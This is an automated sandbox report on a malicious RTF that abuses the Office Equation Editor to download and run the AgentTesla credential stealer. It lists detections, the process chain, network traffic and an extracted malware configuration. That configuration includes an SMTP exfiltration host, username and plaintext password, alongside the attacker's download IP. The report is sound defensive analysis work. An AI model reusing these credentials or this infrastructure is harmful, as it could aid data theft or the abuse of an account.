Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2FBexXRCHR.rtf

Overview

General Information

Sample name:2FBexXRCHR.rtf
renamed because original name is a hash value
Original sample name:02e73ef6a6bde5caa7628ee916111f60.rtf
Analysis ID:1482785
MD5:02e73ef6a6bde5caa7628ee916111f60
SHA1:85fcd05b810401dffc45b6c2cb831787a8a131d3
SHA256:a74f7219f672e155f20c501b9285630b07e70922c058fa3713c29012b8cbdb8c
Tags:rtf
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Outbound SMTP Connections
Stores large binary data to the registry
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3160 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3244 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • winiti.exe (PID: 3392 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 3D33CBDE84D0A1197EC0D459D634473E)
        • winiti.exe (PID: 3468 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 3D33CBDE84D0A1197EC0D459D634473E)
    • EQNEDT32.EXE (PID: 3668 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "25", "Host": "smtp.jlahuachem.com", "Username": "hunk.zhang@jlahuachem.com", "Password": "eGbB!FT9"}
SourceRuleDescriptionAuthorStrings
2FBexXRCHR.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1d93:$obj2: \objdata
  • 0x1d7f:$obj3: \objupdate
  • 0x1d57:$obj5: \objautlink
SourceRuleDescriptionAuthorStrings
00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000006.00000002.714490437.0000000002280000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            5.2.winiti.exe.34c5b90.7.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              5.2.winiti.exe.34c5b90.7.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                5.2.winiti.exe.34c5b90.7.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x33021:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x33093:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x3311d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x331af:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x33219:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x3328b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x33321:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x333b1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                5.2.winiti.exe.3489570.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  5.2.winiti.exe.3489570.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 10 entries

                    Exploits

                    barindex
                    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.46.174.139, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3244, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3244, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe

                    System Summary

                    barindex
                    Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3244, Protocol: tcp, SourceIp: 198.46.174.139, SourceIsIpv6: false, SourcePort: 80
                    Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\winiti.exe, NewProcessName: C:\Users\user\AppData\Roaming\winiti.exe, OriginalFileName: C:\Users\user\AppData\Roaming\winiti.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3244, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , ProcessId: 3392, ProcessName: winiti.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\winiti.exe, NewProcessName: C:\Users\user\AppData\Roaming\winiti.exe, OriginalFileName: C:\Users\user\AppData\Roaming\winiti.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3244, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , ProcessId: 3392, ProcessName: winiti.exe
                    Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\winiti.exe, QueryName: api.ipify.org
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.199.224, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Users\user\AppData\Roaming\winiti.exe, Initiated: true, ProcessId: 3468, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3244, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3160, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                    No Snort rule has matched
                    Timestamp:2024-07-26T06:39:08.862254+0200
                    SID:2022050
                    Source Port:80
                    Destination Port:49163
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T06:39:09.043752+0200
                    SID:2022051
                    Source Port:80
                    Destination Port:49163
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 2FBexXRCHR.rtfAvira: detected
                    Source: C:\Users\user\AppData\Roaming\winiti.exeAvira: detection malicious, Label: HEUR/AGEN.1308749
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exeAvira: detection malicious, Label: HEUR/AGEN.1308749
                    Source: 6.2.winiti.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "25", "Host": "smtp.jlahuachem.com", "Username": "hunk.zhang@jlahuachem.com", "Password": "eGbB!FT9"}
                    Source: 2FBexXRCHR.rtfVirustotal: Detection: 52%Perma Link
                    Source: 2FBexXRCHR.rtfReversingLabs: Detection: 47%
                    Source: C:\Users\user\AppData\Roaming\winiti.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exeJoe Sandbox ML: detected

                    Exploits

                    barindex
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 198.46.174.139 Port: 80Jump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exeJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.22:49164 version: TLS 1.2

                    Software Vulnerabilities

                    barindex
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Source: global trafficDNS query: name: api.ipify.org
                    Source: global trafficDNS query: name: api.ipify.org
                    Source: global trafficDNS query: name: smtp.jlahuachem.com
                    Source: global trafficDNS query: name: smtp.jlahuachem.com
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.67.74.152:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.67.74.152:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.67.74.152:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.67.74.152:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.67.74.152:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.67.74.152:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.67.74.152:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.67.74.152:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.67.74.152:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
                    Source: global trafficTCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
